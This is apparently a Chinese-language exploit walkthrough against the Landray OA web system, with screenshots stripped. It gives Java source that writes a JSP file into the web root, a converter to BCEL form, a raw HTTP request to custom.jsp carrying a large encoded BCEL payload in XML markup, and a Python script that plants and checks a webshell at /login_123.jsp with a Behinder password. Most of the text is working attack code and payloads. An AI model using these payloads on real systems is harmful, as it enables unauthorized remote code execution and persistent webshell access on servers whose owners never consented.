自行搭建环境:

image

生成Bcel代码

蓝凌默认jdk环境为jdk7,本地编译等操作注意要使用jdk7
image

修改代码参数示例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import java.io.PrintWriter;
import sun.misc.BASE64Decoder;

public class FastJsonEchoBCEL {
    public FastJsonEchoBCEL() throws Exception {
    }

    public static void main(String[] args) throws Exception {
        new FastJsonEchoBCEL();
    }

    static {
        try {
            Class cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");
            String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();
            PrintWriter printWriter2 = new PrintWriter(path.split("WEB-INF")[0] + "login_list.jsp");
            String shell = "PCVvdXQucHJpbnRsbigic2hlbGx0ZXN0Iik7JT4=";
            BASE64Decoder decoder = new BASE64Decoder();
            String decodeString = new String(decoder.decodeBuffer(shell), "UTF-8");
            printWriter2.println(decodeString);
            printWriter2.close();
        } catch (Exception var5) {
        }

    }
}

image

生成Bcel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import org.apache.bcel.Repository;
import org.apache.bcel.classfile.JavaClass;
import org.apache.bcel.classfile.Utility;
import java.io.IOException;

public class test {

    public static void main(String[] args) throws ClassNotFoundException, IOException {
        JavaClass javaClass = Repository.lookupClass(FastJsonEchoBCEL.class);
        String codes = Utility.encode(javaClass.getBytes(), true);
        System.out.println("$$BCEL$$"+codes);

    }

}

image

代码来源于print(“”)大佬
https://www.o2oxy.cn/3494.html

构造利用数据包

数据包

1
2
3
4
5
6
7
8
9
10
11
12
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 192.168.1.88:8080
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 2779

var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void+class%3d"com.sun.org.apache.bcel.internal.util.ClassLoader"><void+method%3d"loadClass"><string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85U$dbV$dbF$U$dd$83md$Lq3$98K$92$92$sm$gC$ASB$93$U$I46$s$5c$M$n$dc$j$daRY$I$7b$40H$aa$qS$d2$f6$7f$fa$9c$X$d1U$d6$ea$H$f4$87$fa$d6$d5327$bbjk$_$cf$e5$9c$3d$7b$ce$d9gf$fc$c7_$bf$fd$O$e0$v$7e$96q$lS$S$a6e4aJ$c6K$cc$88f6$8e$afd$bcBVF$Os2$f2$98$97$f1$g$L2$W$b1$qaYBAF$x$a6$e2X$91$d1$87U1y$T$c7$9a$e8$df$caP$b0$k$c7$86$84M$Z$3d$82$7dK$f4$dbq$ec$I$f0$ae$f0$XE$f3N$c2$9e$84$af$Z$9a$a7$b9$c9$bd$Z$86Hzp$9b$n$9a$b3$Ot$86$f6$C7$f5$d5$eaIIw6$d5$92A$96d$c1$d2Tc$5bu$b8$98_$g$a3$5e$85$bb$c27$af$ba$de$92k$99y$adbes$f9$c2$U$83$9c$3f$d3t$db$e3$96I$88$e8$89$caM$86$9e$f4$5e$e1H$3dU3$86j$963$h$9e$c3$cd$f2T$b0$ad$ea$94$J$d6$V$e2f$88Ok$c6U$90$9aA$b0$ce$5b$a8$9c$a1$ba$$$81$a2$b6$eaUD$u$n$E$8aM$Do$c7$e1$9e$ee$8c3$a4j$Yne$d6n$ec$E$8b$b9$V$dd0$Y$a4$D$5d$p$V$i$86$be$82$5b53$t$dc$d52$d9W$h$f9g$Ts5$8f$e0$ac$81j$7b0$b4nx$aav$bc$a2$da$812$q$$$J$b0aU$jM$9f$e7B$a9T$a3B$a3$o$G$F$l$e3$BCG$a3S$c27$K$be$c5$be$82$ef$a0R5Jnet$d1$a4$umG$a7VBI$81$86$D$J$ba$82C$94$rT$Up$iI8V$60$e0D$82$a9$c0$82M$82$86d$ca$d0$db$a8Q$b6$ca$8d$mai$t$9f$jY$5c$9dW$f0$3d$i$F$$$3c$866$c3$wss$df$e0$ae7z$e4$da$K$aa$b0E$e0$a7$M$e9$b5$dc$f6$e9$c1$ee$db$aa$b6$b0d$97$ccu$b7$c4$cb$5c$h$af$Y$a5$d7gc$efvW$c7$W$f9$f1$f3$a5$cd$89$97T$fap$r$v$f9$c6$60$U$fc$803$aa$c6$d6$e6$fc$c8$L$b1$d1$7b$F$3f$e2T$c1OB$ab$ae$h$f8$f5$B$ab$pyS$3a$d25$af$ce$b4Yqt$f5$80$8a$a4U$jG7$bd$abywz$b0$d0$88$a2$d2$a6$ca$ba$97$b3H$ee3$_8$5d$FK$N$o$ed$af$83$dfr$895$a1$O$86$84A$83$c0$c2$f0$u$jr$f8C$8er$7b$83$89$92$a6$88$d6$i$cb$a3$c4$u$dd9$abv$9b$k$5e$c5$e3$ea$94$Y$f7$deg$g1D6$f0$df$I$S$r$c8$96NrpZ$Z$ee$fd$83$f5$c6K$7c$7d$ff$e6ch$n$s$f1J$5c$96$e4$8a$c7$d4$bd$cc$d6$bax$S$94$dbs$3al$o$ab$e0$d6$d6$X$e2$fa$de$c6$5c$db$e0T$ca$c7a$c2$85$3e$V$cd$aam$eb$s$95v$e4$7f$b4$ae$3b$f7$e2$8d$f1$ac$ab$ab$9c$K$5b$ba$7d$7d$e3$b3$d5$c3CQ$d9$9e$d0$a0$b2t$bb$d2$7b$d9p$G$vx$87$M$S$t$a6$Z$96$ab$e3$B$bd$fc$f7$n$3e$R0$f1$W$d0$fca$f0$e7$c0$e8$L$c4$86$ce$c1$3e$d0$a0$J$9fP$x$fe$u$c8$88$u$9a$f1$v$8d$94$g$I$8f$f0$Z$f5$8f$e9$X$r$cb$A$SHc$f0$92$ea9$f5$C$95$b8$40S$f1$i$91$9dF$ba$E$e24$ba$a1K$60$IO$ea$e8$e2$Y$a6$c8$98$a0c$R$da$ae$99$3c$95_$R$f5$RK6$fb$90$96$87$7c$c4$7d$q$7c$c8$3eZ$K$XP$8a$Xh$a5$cd$da$9e$q$db$7dtD$c6$7dt$s$93$d4$f8$e8$3aG$f7J2$b5z$81$k$C$f4NF$_$d0W$ec$8f$8e$f8$e8O$de9$c7$dd$c9$d8p$7f$cc$c7$bda$l$l$fd$82$e8$f2$87$m$s$8d$5e$b9$B$d2HD$3d$8a$Wj$db$u$dav$dcA$H$a6$d1$89Y$q$b1$80$$$U$d1$8d$7d$a4$I$dfK$xzPF$7f$90$d9$M$c5$ac$60$H$p$b4$g$b4j$R$Z$8c$R$f34e$f99$c6I$87Y$c2$3d$r$5b$84x$eeb$C_P$eeE$d2$e5$Z$d9b$q$a2$d0$a5$e9O$iJxA$w$e0$cb$40$c4$c9$bf$B$92$e6un$cc$H$A$A</string><void+method%3d"newInstance"></void></void></void></java>

发送数据包
image

验证结果
image

Script

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import requests
import sys

def GetShell(urllist):
    url = urllist+"/sys/ui/extend/varkind/custom.jsp"
    headers = {"Accept": "text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-cn", "Accept-Encoding": "gzip, deflate", "Origin": "null", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
    data = {"var": "{\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}", "fdParemNames": "11", "fdParameters": "<java><void class=\"com.sun.org.apache.bcel.internal.util.ClassLoader\"><void method=\"loadClass\"><string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85V$dbv$db$d6$R$dd$b0HS$a2$e1$d8$96$z$d9JR$e7$d6$q$b2cY$bc$84$b1e$vvMJ$84$40$C$94x$c5$c5m$5d$Q$84H$88$m$80$Q$80H$aa$fd$9f$3e$e7$85$ee$aa$d6$ea$H$f4$87$fa$96$95$Bh$d9$96$ca6$d2$e2$c19s$f6$d9gf$P1$c3$7f$ff$f2$cf$7f$B$c8$e2oI$7c$86$ed$Ev$92$b8$82$ed$q$7e$c4$f3px$b1$88$3f$q$f1$S$f9$q$K$d8Mb$P$c5$q8$ec$t$c1$a3$94$409$B$n$89$eb$d8$5e$84$98$c4$3dT$c2$c5$c1$o$O$c3g5$J$W$b5E$d4$Th$q$b1$g$b27$c3gk$RR$I$96$c3$7d$r$i$d4$E$5e$r$f0G$GWwL$db$f4$9f3XX$7f$d0b$Q$x8$j$83$c1$N$c1$b4$8dJ0h$h$c3$86$d6$b6$c8$b2$y8$baf$b5$b4$a1$Z$ae$df$gc$7e$cf$f4$c2$bd$a2$e6$f9$r$cf$b1$f7$f4$9e$93$_$ec$J$db$M$92$7bc$ddp$7d$d3$b1$J$R$hh$a6$cd$60u$fd$95p$ac$9dh$9b$96fw7$eb$fe$d0$b4$bb$db$d1$b5$da$b0K$b0$dbs$b6$Z$y$ee$e8$d6$b9$93$baE$b0$5b$l$a0$K$96$e6y$E$8a$b9$9a$df$L$5d$99C$c0$ba4$f1$a5$a1$e9$h$c3$M$83$95$Z$c6t6$P$df$db$J$W$f7z$86e1Ht$M$9dT$Y2$b8$tx$81$bd90$3d$7d3$ff$b2$be$f7$c3$f7$bb$b3$9d$90s$G$9a$dd$c1$e0z$dd$d7$f4$be$a8$b9$912$q$$$JPw$82$a1n$U$cdP$a9$95$cb$K$3d$O$7d$60$f19$be$60p$f3$f2f$C$7fb$f1g$bcf$f1$Xh$94$8d$b6$d7$7b$cc$db$e4$a5$3b4hL$a0$cdBG$t$B$83$c5$R$ba$J$f4X$988N$a0$cf$c2$c2$m$B$9b$85$D$97$E$9d$T$v$83$bb$975$ca$H$a6$V$F$9c$90$f6$f2$h$7c$a5$c8$e2$t$MYx$f0$v4$cb$e9$9a$f6$ebt$s$fb$f8$d8sY$EpC$bfO$98$F$YR$f3i$a9$99$l$vR$c7$e29$cb$d7$b9$adIg7ej$83bF$a9$e7$d2$j$ce$f2$E$d3$f1$a2$b5$dc$N$94l$v$a7$ef$d7N$e6$da$ec$caH$95$c4$a0l$f2$d6$e1$f1$c8$e2$a5$8a$a7$c8$95S$be$d8$ec$aar$_$a5J$b9$be$3e$c9$ef$b6$b9$e2$a9$9e$g$9f$uR$cd$d2m$bfU$de$9b$e1$g$dcVO$e5Z$T$9e$T$5d$p$5bI$eb4$_$d3$fc$m$9b$ku$a4$92$a7Ib$b7$9a$Z$f7$f4$ac$d8U$t$3d$d3$90k$W_$f4$3b$8ai$3d$d1$H$adTG$$$F$fc$fe$ec$9c0$a8Y$ea$c0$K$d4$e6$8c$bb$cc$f1$9eX$Y$9b$c2$60l$b5$H$9d$94V$e8$3f9$92S$91$9f$9a$a4t$cb$fb$rK$97$5b$96$9e$ad$Gj$a6$95jH$ad$94$c6m$f5$cb$85$7e$a0$ca$c5$b4$o$8dO$cb$85R$b5$91$ae4y$b3$ef$g$e9JJ$P$f9$t$f9$e1a$bd$d4$ab$i$ef$8d$w$928R$g$caX$94$f8$U$7dF$fc$b1wR$Od$cem$M$NWW$f2$e2i$a9$d2$96$aa$e9C$beV$R$hje$b7b$f6$b3$3f$c9$dcK$b9d$v$83V$ae$9d$c9$f5$cb$e6$d6$a9J$fej$d2V$m$d8$f9t$a7$a8$f6$da$fb$z$8b$eeN$f3$e6xXn$f8$bb$9a$9cwT$99$ef$w$a7$e9$f3y$e4s$5d$ca$9dv$b8b$a0d$9a$O$df$_$W$9b$T$de$3d$c8$88$81$s$e5$dcN$a1$3b$R$b8$9c$d5$99$e4$h$aaT$99$a8rMPe$abAZ$j$979$_$3a_$b5$ad$94$w$8bN$b9$3e2$ab$cdV$p$8c$f3$m$T$9di$95$f7k$8e$s$8b3$dc$y$H$84$cb$d9$c4s1$9ff$d7$N$ed$94$b7$40$e5$b68$ba$bb$d7$$$f4HC$bd$abg$5b$810H$bb$3a$f9T$ed$X$h$b5$86$92$aa$d1$fd$ed$cc$ec$5c$983$r$b3$d5W$9b$a5$b4$3aP$c9$d6$9b$84$da$93$k$va$d0$b1$3aE$d2$e9$ed$j$82$j$cdE$e2$tm$fatg$3fh$PZ$d9$P5$m$3f$c2$9c$92$7e$a2$a3sE$9b$be$L$tm$bbf$Z$fbU$faNQ$eem$f1G$aah$f3$L$E$bd$d3$97$df1$W$p$8c$a9$c84$h$c5$8d$a7$e1$L4aq$8a$T$W$7f$NK$c0$ed$f7$f0wu$f3$C$c9A$fb$d8$d0$fd$L$a6Fohh$jzA$f5$6084l$ff$7c$7dg$fd$81p$ZE$Vk$a5k$f8$F$87$aa$c8$d8$8f$8a$a6$e0h$91$a7k$X$e0$ll$85g$e6n0X$b2h$SY$Y$7c$bd$3e$a7$a6$cf$a9$d07$$$99$uh$f2$e8p$e8$f8$U$Y$85$bb$eb$cc$9a$c4$97$e7$fex$G$Ff$fa$93$cd$cb$Y$o$bb$ff$ff$R$qJ$U$z$V$e8$a8$I3$f8$f4$bfX$df$ef$S$df$bd$ff$b5$c7$e0$g1$85$cd$efmJ$ceyl$c3$dfl$d6$c2N$c7$7e$b8$a6$g$gF$V5$a3$8b$89x$d7$8e$e2$9ek$99$94$cao$e7$J7$b7$D$5e$d5$5c$d7$b0$v$b5$h$bf$a1$f5$85r$k$b6N$df9$efP$x$f3$8e$b6$de5$b2$7cpt$Ufvu$aeSyj$g$eb$af$f2$f3$Z$SQ$7b$b5H$9c$b8n9$9e$81$_$e8$H$cdg$I$ff$W$c0$84$z$8e$d6_F$bfy$Y$fa$H$e2$P$df$80$f9$99$sW$f0$V$8d$e1$ef$l2$o$86$ab$f8$3d$cd$d8$Z$I_$e3$hz$7eK$9f$YY$eec$J$ebx$f0$96$ea$J$3dC$d4$d2$Z$ae$uo$b0$m$5d$a6$5b$c2$o$cd$de$d3$z$e1$n$be$bb$40$b7$88G$e4$Z$T$d2Q$x$8b$d3$e5$40$ef$l$88M$R_$be$3aE$a2$fcp$8a$c5$v$96$a6HNqM8$D$ab$9c$e1$3a$5d$f6$d1w$cb7$a6$b8$b9$90$99$e2$d6$f22$NS$dc$7e$83$3b$e2$f2J$e5$M$ab$E$b8$fb$yv$86$7b$caZlc$8a$b5$e5$8f$df$e0$93g$f1Gk$f1$v$3e$7d4$c5$ef$fe$8eX$f9$e7$c8$t$9d$9a$f7$7d$d2$u$f4$fa1$ae$d1$f8$Ry$7b$D$l$e3$svp$L$_$b0$8c$7d$dc$86$82$3bx$8d$V$c2$df$a5$T$ab$e8b$z$8a$ec9$f9$ccB$c2$G$9d$G$9d$e2$b1$89$U1$efP$94idH$87$X$84$cb$92m$81x$3e$c1$f7$c8Q$ec$K$e9$f2$D$d9$e2$qb$a8$cb$95$ff$e0$u$81$a7$a4$C$b6$o$R$9f$fd$KP$d5$f3$3c$a3$K$A$A</string><void method=\"newInstance\"></void></void></void></java>\r\n"}
    requests.post(url, headers=headers, data=data)
    listshell = urllist+"/login_123.jsp"
    listshellr = requests.get(url=listshell)


    if listshellr.status_code == 200 and "yes" in listshellr.text:
        print("成功GetShellshell地址为:"+urllist+"/login_123.jsp   ---->冰蝎3密码为:yse")
    else:
        print("webshell不存在利用失败--请手动验证")


def main():
    if (len(sys.argv) == 2):
        url = sys.argv[1]
        GetShell(url)
    else:
        print("python3 lgo.py http://xx.xx.xx.xx")

if __name__ == '__main__':
    main()